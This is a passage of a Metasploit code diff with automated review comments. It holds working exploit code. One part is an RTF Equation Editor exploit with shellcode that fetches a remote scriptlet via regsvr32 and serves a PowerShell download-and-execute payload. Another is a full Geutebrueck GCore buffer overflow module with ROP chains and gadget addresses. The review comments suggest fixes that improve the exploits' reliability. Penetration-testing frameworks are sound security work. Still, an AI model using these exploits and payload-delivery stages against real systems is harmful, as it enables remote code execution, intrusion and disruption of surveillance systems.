'00000000000000000000000000000000000000000000000000000000000000000' + object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '0001000000660000000000000003004f0062006a0049006e0066006f000000000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000' + object_class << '00000000000000000000000000000000000000000000000000000000000000003' + object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060' + object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 
'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000' + object_class << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045' + object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << "00000300040000000000000000000000000000000000000000000000000000000" + object_class << "000000000000000000000000000000000000000000000000000000000000000\n" + + + shellcode = "\x1c\x00" # 0: 1c 00 sbb al,0x0 + shellcode << "\x00\x00" # 2: 00 00 add BYTE PTR [eax],al + shellcode << "\x02\x00" # 4: 02 00 add al,BYTE PTR [eax] + shellcode << "\x9e" # 6: 9e sahf + shellcode << "\xc4\xa9\x00\x00\x00\x00" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0] + shellcode << "\x00\x00" # d: 00 00 add BYTE PTR [eax],al + shellcode << "\x00\xc8" # f: 00 c8 add al,cl + shellcode << "\xa7" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi] + shellcode << "\\" # 12: 5c pop esp + shellcode << "\x00\xc4" # 13: 00 c4 add ah,al + shellcode << "\xee" # 15: ee out dx,al + shellcode << "[" # 16: 5b pop ebx + shellcode << "\x00\x00" # 17: 00 00 add BYTE PTR [eax],al + shellcode << "\x00\x00" # 19: 00 00 add BYTE PTR [eax],al + shellcode << "\x00\x03" # 1b: 00 03 add BYTE PTR [ebx],al + shellcode << "\x01\x01" # 1d: 01 01 add DWORD PTR [ecx],eax + shellcode << "\x03\n" # 1f: 03 0a add ecx,DWORD PTR [edx] + shellcode << "\n\x01" # 21: 0a 01 or 
al,BYTE PTR [ecx] + shellcode << "\x08ZZ" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl + shellcode << "\xB8\x44\xEB\x71\x12" # 26: b8 44 eb 71 12 mov eax,0x1271eb44 + shellcode << "\xBA\x78\x56\x34\x12" # 2b: ba 78 56 34 12 mov edx,0x12345678 + shellcode << "\x31\xD0" # 30: 31 d0 xor eax,edx + shellcode << "\x8B\x08" # 32: 8b 08 mov ecx,DWORD PTR [eax] + shellcode << "\x8B\x09" # 34: 8b 09 mov ecx,DWORD PTR [ecx] + shellcode << "\x8B\x09" # 36: 8b 09 mov ecx,DWORD PTR [ecx] + shellcode << "\x66\x83\xC1\x3C" # 38: 66 83 c1 3c add cx,0x3c + shellcode << "\x31\xDB" # 3c: 31 db xor ebx,ebx + shellcode << "\x53" # 3e: 53 push ebx + shellcode << "\x51" # 3f: 51 push ecx + shellcode << "\xBE\x64\x3E\x72\x12" # 40: be 64 3e 72 12 mov esi,0x12723e64 + shellcode << "\x31\xD6" # 45: 31 d6 xor esi,edx + shellcode << "\xFF\x16" # 47: ff 16 call DWORD PTR [esi] + shellcode << "\x53" # 49: 53 push ebx + shellcode << "\x66\x83\xEE\x4C" # 4a: 66 83 ee 4c sub si,0x4c + shellcode << "\xFF\x10" # 4e: ff 10 call DWORD PTR [eax] + shellcode << "\x90" # 50: 90 nop + shellcode << "\x90" # 50: 90 nop + + footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' + footer << '4500710075006100740069006F006E0020004E006100740069007600650000000' + footer << '00000000000000000000000000000000000000000000000000000' + footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000' + footer << '00000000000000000000000000000000000000000000000000000000000000400' + footer << '0000C5000000000000000000000000000000000000000000000000' + footer << '0000000000000000000000000000000000000000000000000000000000000000' + footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00' + footer << '000000000000000000000000000000000000000000000000000000' + footer << '0000000000000000000000000000000000000000000000000000000000000000' + footer << '000000000000000000000000000000000000000000000000000000' + footer << 
'0000000000000000000000000000000000000000000000000000000000FFFFFF' + footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000' + footer << '00000000000000000000000000000000000000000000000000000000000000000' + footer << '00000000000000000000000000000000000000000000000000000' + footer << '00000000000000000000000000000000000000000000000000000000000000000' + footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000' + footer << '00000000000000000000000000000000000000000000000000000000000000000' + footer << '00000000000000001050000050000000D0000004D45544146494C' + footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C' + footer << '500000002001C0000000000050000000902000000000500000002' + footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF' + footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090' + footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016' + footer << '0A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A00000031313131313131' + footer << '3131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB02100007000000' + footer << '0000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F00100' + footer << '00030000000000' + "\n" + footer << '}{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260' + "\n" + footer << "0100090000039e00000002001c0000000000050000000902000000000500000002010100000005\n" + footer << "0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002\n" + footer << "1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000\n" + footer << 
"0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000\n" + footer << "0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000\n" + footer << "002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100\n" + footer << "000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a\n" + footer << "0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\n" + footer << "00000000\n" + footer << "}}}\n" + footer << '\par}' + "\n" + + + payload = shellcode + payload += [0x00402114].pack("V") + payload += "\x00" * 2 + payload += "regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll" + payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first + payload = header + object_class + payload + footer + payload + end + + + + def gen_psh(url, *method) + ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl + + if method.include? 'string' + download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url)) + else + # Random filename to use, if there isn't anything set + random = "#{rand_text_alphanumeric 8}.exe" + # Set filename (Use random filename if empty) + filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME'] + + # Set path (Use %TEMP% if empty) + path = datastore['BinaryEXE-PATH'].blank? ? 
"$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}') + + # Join Path and Filename + file = %Q(echo (#{path}+'\\#(unknown)')) + + # Generate download PowerShell command + download_string = Rex::Powershell::PshMethods.download_run(url, file) + end + + download_and_run = "#{ignore_cert}#{download_string}" + + # Generate main PowerShell command + return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run) + end + + def on_request_uri(cli, _request) + if _request.raw_uri =~ /\.sct$/ + print_status("Handling request for .sct from #{cli.peerhost}") + payload = gen_psh("#{get_uri}", "string") + data = gen_sct_file(payload) + send_response(cli, data, 'Content-Type' => 'text/plain') + else + print_status("Delivering payload to #{cli.peerhost}...") + p = regenerate_payload(cli) + data = cmd_psh_payload(p.encoded, + payload_instance.arch.first, + remove_comspec: true, + exec_in_place: true + ) + send_response(cli, data, 'Content-Type' => 'application/octet-stream') + end + end + + + def rand_class_id + "#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}" + end + + + def gen_sct_file(command) + # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error). + if command == '' + return %{} + # If a command is provided, tell the target system to execute it. + else + return %{} + end + end + + + def primer + file_create(generate_rtf) + end +end diff --git a/modules/exploits/windows/fileformat/ursoft_w32dasm.rb b/modules/exploits/windows/fileformat/ursoft_w32dasm.rb index 6fc3454f39..defdb3b3c4 100644 --- a/modules/exploits/windows/fileformat/ursoft_w32dasm.rb +++ b/modules/exploits/windows/fileformat/ursoft_w32dasm.rb 
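Review bot: `generate_rtf` pads the embedded font-name field to 197 bytes with `"\x00" * (197 - payload.length)` but never checks that the regsvr32 command actually fits; the shellcode is 82 bytes and the address plus two NULs add 6 more, which by my count leaves about 73 bytes for `get_uri`, so a long SRVHOST/LHOST or URIPATH makes the multiplier negative and the run dies with `ArgumentError: negative argument` instead of a usable diagnostic. Insert `fail_with(Failure::BadConfig, "regsvr32 stub is #{payload.length} bytes but only 197 fit in the font name; use a shorter SRVHOST/URIPATH") if payload.length > 197` immediately before the padding line. `gen_psh` also reads `PSH-Proxy`, `BinaryEXE-FILENAME` and `BinaryEXE-PATH` from the datastore although this module registers only `FILENAME` and `FOLDER_PATH`, so those branches look like leftovers from another module and are dead here unless an operator sets them by hand. As rendered on this page both branches of `gen_sct_file` return a bare `%{}`; that is presumably the scriptlet markup being lost in display, but if it is the committed code the regsvr32 stage fetches an empty scriptlet and the PowerShell stage is never reached.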
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote locally as the user. }, 'License' => MSF_LICENSE, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'References' => [ [ 'CVE', '2005-0308' ], diff --git a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb index 39b8b166cf..a145c7c5d9 100644 --- a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb +++ b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote This functionality has not been tested in this module. }, 'License' => MSF_LICENSE, - 'Author' => [ 'Trancek ', 'patrick' ], + 'Author' => [ 'Trancek ', 'aushack' ], 'References' => [ [ 'CVE', '2004-0964' ], diff --git a/modules/exploits/windows/ftp/dreamftp_format.rb b/modules/exploits/windows/ftp/dreamftp_format.rb index e959770970..9b17090505 100644 --- a/modules/exploits/windows/ftp/dreamftp_format.rb +++ b/modules/exploits/windows/ftp/dreamftp_format.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a format string overflow in the BolinTech Dream FTP Server version 1.02. Based on the exploit by SkyLined. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'References' => diff --git a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb index f277033c1b..d0ddeeafdc 100644 --- a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb +++ b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote client that is triggered through an excessively long PASV reply command. This module was ported from the original exploit by drG4njubas with minor improvements. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ 
diff --git a/modules/exploits/windows/ftp/sami_ftpd_user.rb b/modules/exploits/windows/ftp/sami_ftpd_user.rb index 4204a62eb2..8b37f12ff1 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_user.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_user.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote payloads. When the server is restarted, it will re-execute the exploit until the logfile is manually deleted via the file system. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'Stance' => Msf::Exploit::Stance::Passive, diff --git a/modules/exploits/windows/ftp/sasser_ftpd_port.rb b/modules/exploits/windows/ftp/sasser_ftpd_port.rb index ab320aef43..84fe672be6 100644 --- a/modules/exploits/windows/ftp/sasser_ftpd_port.rb +++ b/modules/exploits/windows/ftp/sasser_ftpd_port.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits the FTP server component of the Sasser worm. By sending an overly long PORT command the stack can be overwritten. }, - 'Author' => [ '', '', 'patrick' ], + 'Author' => [ '', '', 'aushack' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'References' => diff --git a/modules/exploits/windows/games/racer_503beta5.rb b/modules/exploits/windows/games/racer_503beta5.rb index ff545f49f5..f2834618a5 100644 --- a/modules/exploits/windows/games/racer_503beta5.rb +++ b/modules/exploits/windows/games/racer_503beta5.rb @@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - # Tested ok patrickw 20090503 + # Tested ok aushack 20090503 [ 'Fmodex.dll - Universal', { 'Ret' => 0x10073FB7 } ], # jmp esp [ 'Win XP SP2 English', { 'Ret' => 0x77d8af0a } ], [ 'Win XP SP2 Spanish', { 'Ret' => 0x7c951eed } ], diff --git a/modules/exploits/windows/http/amlibweb_webquerydll_app.rb b/modules/exploits/windows/http/amlibweb_webquerydll_app.rb index cd2e6f4fc4..f0624a4f82 100644 
--- a/modules/exploits/windows/http/amlibweb_webquerydll_app.rb +++ b/modules/exploits/windows/http/amlibweb_webquerydll_app.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote In addition, it is possible to overwrite EIP by specifying an arbitrary parameter name with an '=' terminator. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'References' => @@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => ['win'], 'Targets' => [ - # patrickw - Tested OK 20100803 w2k IIS5 + # aushack - Tested OK 20100803 w2k IIS5 [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll - 'dll?app={buff}' for SeH IIS5 # [ 'Windows 2003 Server All - English', { 'Ret' => 0x44434241 } ], # todo: 'dll?{buff}=' call edi for EIP in IIS6 w3wp.exe, 120 byte limit, ASCII only. ], diff --git a/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb b/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb index 4a77dae4ed..38643b7738 100644 --- a/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb +++ b/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote The flaw affects multiple platforms, however this module currently only supports Windows based installations. }, - 'Author' => 'patrick', + 'Author' => 'aushack', 'References' => [ [ 'CVE', '2006-3747' ], @@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote }, 'Targets' => [ - [ 'Automatic', {} ], # patrickw tested OK 20090310 win32 + [ 'Automatic', {} ], # aushack tested OK 20090310 win32 ], 'DisclosureDate' => 'Jul 28 2006', 'DefaultTarget' => 0)) @@ -78,7 +78,7 @@ class MetasploitModule < Msf::Exploit::Remote def exploit # On Linux Apache, it is possible to overwrite EIP by - # sending ldap:// ... TODO patrickw + # sending ldap:// ... TODO aushack trigger = '/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90' 
diff --git a/modules/exploits/windows/http/ca_igateway_debug.rb b/modules/exploits/windows/http/ca_igateway_debug.rb index 16a5c8fb8a..415ef02818 100644 --- a/modules/exploits/windows/http/ca_igateway_debug.rb +++ b/modules/exploits/windows/http/ca_igateway_debug.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote in igateway.conf (non-default), it is possible to overwrite the stack and execute code remotely. This module works best with Ordinal payloads. }, - 'Author' => 'patrick', + 'Author' => 'aushack', 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb new file mode 100644 index 0000000000..5328a095d0 --- /dev/null +++ b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb 
@@ -0,0 +1,260 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'nokogiri' +require 'open-uri' + +class MetasploitModule < Msf::Exploit::Remote + include Msf::Exploit::Remote::Tcp + + Rank = NormalRanking + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE', + 'Description' => %q{ + This module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe). + The vulnerable webserver is running on Port 13003 and Port 13004, does not require + authentication and affects all versions from 2003 till July 2016 (Version 1.4.YYYYY). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Luca Cappiello', + 'Maurice Popp' + ], + 'References' => + [ + ['EDB','41153'], + ['CVE', '2017-11517'], + ['URL','www.geutebrueck.com'] + ], + 'Platform' => 'win', + 'Targets' => + [ + ['Automatic Targeting', { 'auto' => true, 'Arch' => ARCH_X64 }], + ['GCore 1.3.8.42, Windows x64 (Win7+)', { 'Arch' => ARCH_X64}], + ['GCore 1.4.2.37, Windows x64 (Win7+)', { 'Arch' => ARCH_X64}] + ], + 'Payload' => + { + 'Space' => '2000' + }, + 'Privileged' => true, + 'DisclosureDate' => 'Jan 24 2017', + 'DefaultTarget' => 0)) + + register_options( + [Opt::RPORT(13003)] + ) + end + + def fingerprint + print_status("Trying to fingerprint server with http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml...") + @doc = Nokogiri::XML(open("http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml")) + statistics = @doc.css('modulestate') + statistics.each do |x| + if (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.3.8.42') + mytarget = targets[1] + print_status("Vulnerable version detected: #{mytarget.name}") + return Exploit::CheckCode::Appears, mytarget + elsif (x.to_s.include? 'GCoreServer') && (x.to_s.include? 
'1.4.2.37') + mytarget = targets[2] + print_status("Vulnerable version detected: #{mytarget.name}") + return Exploit::CheckCode::Appears, mytarget + end + end + print_status("Statistics Page under http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml is not available.") + print_status('Make sure that you know the exact version, otherwise you\'ll knock out the service.') + print_status('In the default configuration the service will restart after 1 minute and after the third crash the server will reboot!') + print_status('After a crash, the videosurveillance system can not recover properly and stops recording.') + [Exploit::CheckCode::Unknown, nil] + end + + def check + fingerprint + end + + def ropchain(target) + rop = '' + # These bytes "\x43" are sacrificed ; we align the stack to jump over this messed up crap. + stack_align = "\x43" * 16 + + if target.name.include? '1.3.8.42' + print_status('Preparing ROP chain for target 1.3.8.42!') + + # 0x140cd00a9 | add rsp, 0x10 ; ret + # This is needed because the next 16 bytes are sometimes messed up. + overwrite = [0x140cd00a9].pack('Q<') + + # We have 40 bytes left to align our stack! + # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations + # and to restore it. + # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough. + + # 0x1404e5cbf: mov edx, esp ; ret + stack_align << [0x1404e5cbf].pack('Q<') + + # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value. + # We pop -XXXXX as \xxxxxxxxx to rax + # 0x14013db94 pop rax ; ret + stack_align << [0x14013db94].pack('Q<') + stack_align << [0xFFFFFFFFFFFFF061].pack('Q<') + + # Our value is enough. + # 0x1407dc547 | add rax,rdx ; ret + stack_align << [0x1407dc547].pack('Q<') + + # RSP gets restored with the new value. 
The return instruction doesn't break our ropchain and continues -XXXXX back. + # 0x140ce9ac0 | mov rsp, rax ; ..... ; ret + stack_align << [0x140ce9ac0].pack('Q<') + + # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. + # We want RCX to hold the value for VP Argument "Address of Shellcode" + # 0x140cc2234 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; + rop << [0x140cc2234].pack('Q<') + rop << [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; + # 0x1400ae2ae | POP RDX; RETN + # 0x...1000 | Value for VP "Size of Memory" + rop << [0x1400ae2ae].pack('Q<') + rop << [0x0000000000000400].pack('Q<') + + # 0x14029dc6e: | POP R8; RET + # 0x...40 | Value for VP "Execute Permissions" + rop << [0x14029dc6e].pack('Q<') + rop << [0x0000000000000040].pack('Q<') + + # 0x1400aa030 | POP R9; RET + # 0x1409AE1A8 is the .data section of gcore + rop << [0x1400aa030].pack('Q<') + rop << [0x1409AE1A8].pack('Q<') + + # 0x140b5927a: xor rax, rax ; ret + rop << [0x140b5927a].pack('Q<') + + # 0x1402ce220 pop rax ; ret + # 0x140d752b8 | VP Stub IAT Entry + rop << [0x1402ce220].pack('Q<') + rop << [0x140d752b8].pack('Q<') + + # 0x1407c6b3b mov rax, qword [rax] ; ret ; + rop << [0x1407c6b3b].pack('Q<') + + # 0x140989c41 push rax; ret + rop << [0x140989c41].pack('Q<') + + # 0x1406d684d jmp rsp + rop << [0x1406d684d].pack('Q<') + + [rop, overwrite, stack_align] + + elsif target.name.include? '1.4.2.37' + print_status('Preparing ROP chain for target 1.4.2.37!') + + # 0x140cd9759 | add rsp, 0x10 ; ret + # This is needed because the next 16 bytes are sometimes messed up. + overwrite = [0x140cd9759].pack('Q<') + + # We have 40 bytes left to align our stack! + # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations + # and to restore it. + # We save RSP to RDX. 
Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough. + + # 0x1404f213f: mov edx, esp ; ret + stack_align << [0x1404f213f].pack('Q<') + + # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value. + # We pop -XXXXX as \xxxxxxxxx to rax + # 0x14000efa8 pop rax ; ret + stack_align << [0x14000efa8].pack('Q<') + stack_align << [0xFFFFFFFFFFFFF061].pack('Q<') + + # Our value is enough. + # 0x140cdfe65 | add rax,rdx ; ret + stack_align << [0x140cdfe65].pack('Q<') + + # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back. + # 0x140cf3110 | mov rsp, rax ; ..... ; ret + stack_align << [0x140cf3110].pack('Q<') + + # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. + # We want RCX to hold the value for VP Argument "Address of Shellcode" + # 0x140ccb984 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; + rop << [0x140ccb984].pack('Q<') + rop << [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; + # 0x14008f7ec | POP RDX; RETN + # 0x...1000 | Value for VP "Size of Memory" + rop << [0x14008f7ec].pack('Q<') + rop << [0x0000000000000400].pack('Q<') + + # 0x140a88f81: | POP R8; RET + # 0x...40 | Value for VP "Execute Permissions" + rop << [0x140a88f81].pack('Q<') + rop << [0x0000000000000040].pack('Q<') + + # 0x1400aa030 | POP R9; RET + # 0x... | Value for VP "Writeable location". Not sure if needed? + # 0x140FB5000 is the .data section of gcore; let's test with this writable section... 
+ rop << [0x1400aa030].pack('Q<') + rop << [0x140FB5000].pack('Q<') + + # 0x140ccea2f: xor rax, rax ; et + rop << [0x140ccea2f].pack('Q<') + + # 0x14000efa8 pop rax ; ret + # 0x140d83268 | VP Stub IAT Entry + rop << [0x14000efa8].pack('Q<') + rop << [0x140d83268].pack('Q<') + + # 0x14095b254 mov rax, qword [rax] ; ret ; + rop << [0x14095b254].pack('Q<') + + # 0x140166c46 push rax; ret + rop << [0x140166c46].pack('Q<') + + # 0x140cfb98d jmp rsp + rop << [0x140cfb98d].pack('Q<') + + [rop, overwrite, stack_align] + + else + print_status('ROP chain for this version not (yet) available or the target is not vulnerable.') + end + end + + def exploit + if target['auto'] + checkcode, target = fingerprint + fail_with(Failure::NotVulnerable, 'No vulnerable Version detected - exploit aborted.') if checkcode.to_s.include? 'unknown' + target_rop, target_overwrite, target_stack_align = ropchain(target) + else + print_status('No auto detection - be sure to choose the right version! Otherwise the service will crash, the system reboots and leaves the surveillance software in an undefined status.') + print_status("Selected version: #{self.target.name}") + target_rop, target_overwrite, target_stack_align = ropchain(self.target) + end + + begin + connect + print_status('Crafting Exploit...') + exploit = 'GET /' + exploit << "\x41" * 200 + exploit << target_rop + exploit << payload.encoded + exploit << "\x41" * 1823 + exploit << target_overwrite + exploit << target_stack_align + + print_status('Exploit ready for sending...') + sock.put(exploit, 'Timeout' => 20) + print_status('Exploit sent!') + buf = sock.get_once || '' + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}\n#{e.fail_with}") + ensure + print_status('Closing socket.') + disconnect + end + end + end 
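Review bot: `check` returns whatever `fingerprint` returns, which is a two-element array (`[CheckCode, target]`) rather than a CheckCode, and the `open(...)` call in `fingerprint` has no rescue, so an unreachable host or a non-HTTP port raises out of `check` instead of yielding `Unknown`. Fetching through open-uri also bypasses the Rex socket the exploit itself uses via `connect`, so the fingerprint will not follow a pivot route or the framework's proxy settings, and `Kernel#open` on an interpolated string is a well-known footgun (`URI(...).open` is the safer spelling). Separately, the `rescue` in `exploit` calls `e.fail_with`, which is not a method on the exception and will itself raise `NoMethodError` as soon as one of the listed errors occurs; drop it and report with `print_error` instead. The `else` branch of `ropchain` only prints a status and returns `nil`, so the destructuring in `exploit` then feeds `nil` to `<<` and fails with `TypeError`; a `fail_with(Failure::NoTarget, ...)` there would be clearer. The suggested shape for the fetch and for `check` is below.
```ruby
def fingerprint
  url = "http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml"
  print_status("Trying to fingerprint server with #{url}...")
  begin
    # URI#open rather than Kernel#open: the string is never treated as a shell command.
    @doc = Nokogiri::XML(URI.parse(url).open(read_timeout: 10))
  rescue OpenURI::HTTPError, SocketError, SystemCallError, ::Timeout::Error => e
    print_error("Could not fetch #{url}: #{e.class} #{e.message}")
    return [Exploit::CheckCode::Unknown, nil]
  end
  # … unchanged: <modulestate> version matching and the status messages …
end

def check
  fingerprint.first
end
```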
diff --git a/modules/exploits/windows/http/mcafee_epolicy_source.rb b/modules/exploits/windows/http/mcafee_epolicy_source.rb index de2bc48208..cde280d027 100644 --- a/modules/exploits/windows/http/mcafee_epolicy_source.rb +++ b/modules/exploits/windows/http/mcafee_epolicy_source.rb @@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote 'muts ', 'xbxice[at]yahoo.com', 'hdm', - 'patrick' # MSF3 rewrite, ePO v2.5.1 target + 'aushack' # MSF3 rewrite, ePO v2.5.1 target ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb b/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb index 6e2d330a1f..3bd9a08880 100644 --- a/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb +++ b/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb @@ -26,7 +26,7 @@ class MetasploitModule < Msf::Exploit::Remote continue to crash/execute the payload until the CGI output is manually deleted from the queue in C:\MDaemon\RawFiles\*.raw. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 